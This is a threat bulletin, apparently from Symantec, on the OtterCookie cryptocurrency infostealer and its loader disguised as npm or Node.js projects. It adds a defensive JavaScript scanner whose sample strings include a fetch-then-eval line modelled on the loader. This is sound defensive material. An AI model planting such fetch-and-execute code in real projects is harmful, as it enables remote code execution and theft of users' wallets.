
OtterCookie observed being used by nation states to steal cryptocurrency

Week 02, 2025

OtterCookie, an infostealer designed to steal cryptocurrency information, has recently been observed in use by nation-state actors. The attack begins after users are tricked into downloading the loader, which is disguised as npm or Node.js projects. Once executed, the loader downloads JSON data from a remote location and executes the cookie property as JavaScript code. Once a machine is infected, OtterCookie is able to receive remote commands, execute shell commands, and scan the infected machine for documents or images containing cryptocurrency wallets.
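The loader behaviour described above (remote JSON fetched, then its cookie property run as code) can be triaged statically when reviewing an unfamiliar Node.js project. The following is an added example, not Symantec's detection logic or code from the original bulletin; the regexes, severity levels and sample sources are constructed for illustration.

```javascript
// Static triage heuristic (added example): flag Node.js source that fetches
// remote data and passes its `cookie` property to a dynamic-execution sink.
// All regexes, severities and sample sources below are constructed.
const SINKS = [
  { name: "eval", re: /\beval\s*\((.*)/ },
  { name: "new Function", re: /\bnew\s+Function\s*\((.*)/ },
  { name: "vm.runIn*", re: /\bvm\.runIn\w+\s*\((.*)/ },
];
const NETWORK = /\b(fetch|axios(\.\w+)?|https?\.(get|request)|got|request)\s*\(/;
const COOKIE_PROP = /\.cookie\b|\[\s*['"]cookie['"]\s*\]/;
const ALIAS = /\b(?:const|let|var)\s+(\w+)\s*=\s*[^;]*(?:\.cookie\b|\[\s*['"]cookie['"]\s*\])/g;
const DESTRUCTURED = /\b(?:const|let|var)\s*\{[^}]*\bcookie\b[^}]*\}\s*=/;

function scanSource(source) {
  const hasNetwork = NETWORK.test(source);
  // Names that hold the cookie property, so `eval(code)` is still caught.
  const aliases = new Set([...source.matchAll(ALIAS)].map((m) => m[1]));
  if (DESTRUCTURED.test(source)) aliases.add("cookie");
  const findings = [];
  source.split(/\r?\n/).forEach((text, i) => {
    if (/^\s*(\/\/|\*)/.test(text)) return; // ignore comment-only lines
    for (const { name, re } of SINKS) {
      const m = re.exec(text);
      if (!m) continue;
      const arg = m[1];
      const tainted = COOKIE_PROP.test(arg) ||
        [...aliases].some((a) => new RegExp(`\\b${a}\\b`).test(arg));
      const severity = hasNetwork && tainted ? "high" : hasNetwork ? "medium" : "low";
      findings.push({ line: i + 1, sink: name, severity });
    }
  });
  return findings;
}

// Constructed samples: direct use, aliased use, and a benign file.
const DIRECT = `const axios = require("axios");
axios.get("https://example.invalid/api").then((res) => {
  eval(res.data.cookie);
});`;
const ALIASED = `const res = await fetch("https://example.invalid/api");
const body = await res.json();
const code = body["cookie"];
new Function(code)();`;
const BENIGN = `const cfg = JSON.parse(fs.readFileSync("cfg.json", "utf8"));
console.log(cfg.cookie);`;

console.log(scanSource(DIRECT), scanSource(ALIASED), scanSource(BENIGN));
```

A "high" finding is a prompt for manual review of the file, not a verdict; minified or obfuscated loaders will evade line-based matching like this.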

Symantec protects you from this threat, identified by the following:

Adaptive-based

  • ACM.Ps-Wscr!g1

Carbon Black-based

  • Associated malicious indicators are blocked and detected by existing policies within VMware Carbon Black products. The recommended policy at a minimum is to block all types of malware from executing (Known, Suspect, and PUP) as well as delay execution for cloud scan to get maximum benefit from VMware Carbon Black Cloud reputation service.

File-based

  • JS.Cryxos!gen1
  • Trojan.Gen.MBT

Web-based

  • Observed domains/IPs are covered under security categories in all WebPulse enabled products
